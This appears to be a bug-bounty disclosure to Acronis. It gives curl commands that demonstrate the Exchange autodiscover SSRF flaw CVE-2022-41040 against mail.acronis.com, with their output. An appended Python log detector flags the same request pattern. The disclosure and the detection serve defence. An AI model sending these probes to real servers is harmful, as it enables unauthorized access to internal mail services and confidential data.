EPSS Percentile: 99.4%
Hello Acronis team,
Please run
curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync"
curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol
and get the following output:
404 and {"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"}
Proving that mail.acronis.com is vulnerable to CVE-2022-41040.
PoC video attached.
SSRF can be used for unauthorized actions or access to confidential data.
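As an added, defender-side example (not part of the report above), a small Python detector that flags the autodiscover request pattern shown in the PoC when run over IIS-style web log lines; the log field order, the sample lines and the placeholder e-mail value are constructed assumptions.

```python
from collections import Counter
from urllib.parse import parse_qs

# Constructed IIS W3C-style lines (assumed field order:
# date time method uri-stem uri-query client-ip status). Not real traffic.
SAMPLE_LOG = """\
2022-10-01 10:00:01 GET /autodiscover/autodiscover.json Email=autodiscover/placeholder%40example.invalid&Protocol=ActiveSync 203.0.113.5 404
2022-10-01 10:00:02 GET /owa/ - 198.51.100.7 200
2022-10-01 10:00:03 GET /autodiscover/autodiscover.json Email=alice%40example.invalid&Protocol=ActiveSync 198.51.100.9 200
2022-10-01 10:00:04 HEAD /Autodiscover/Autodiscover.json Email=autodiscover/placeholder%40example.invalid&Protocol=ActiveSync 203.0.113.5 404
"""

AUTODISCOVER_STEM = "/autodiscover/autodiscover.json"


def parse_line(line):
    """Split one log line into a dict; IIS writes '-' for an empty query."""
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, method, stem, query, client_ip, status = parts[:7]
    return {"ts": f"{date} {time}", "method": method, "stem": stem,
            "query": "" if query == "-" else query,
            "client_ip": client_ip, "status": status}


def is_autodiscover_ssrf_probe(stem, query):
    """True when the URL matches the CVE-2022-41040 probe shape from the PoC:
    autodiscover.json with an Email value of the form 'autodiscover/...@...'."""
    if stem.lower() != AUTODISCOVER_STEM:
        return False
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    emails = params.get("email", [])
    return any(e.lower().startswith("autodiscover/") and "@" in e for e in emails)


def find_probes(log_text):
    """Return parsed records that match the probe pattern. The HTTP status is
    deliberately not used as a filter: the PoC above got a 404 on HEAD while
    the GET still returned the proxied JSON body."""
    records = (parse_line(l) for l in log_text.splitlines())
    return [r for r in records if r and is_autodiscover_ssrf_probe(r["stem"], r["query"])]


def probes_by_source(log_text):
    """Count matching requests per client IP to surface the noisiest sources."""
    return Counter(r["client_ip"] for r in find_probes(log_text))
```

Legitimate Autodiscover clients send a plain mailbox address in Email, so a value that starts with "autodiscover/" is a strong signal worth alerting on regardless of response code.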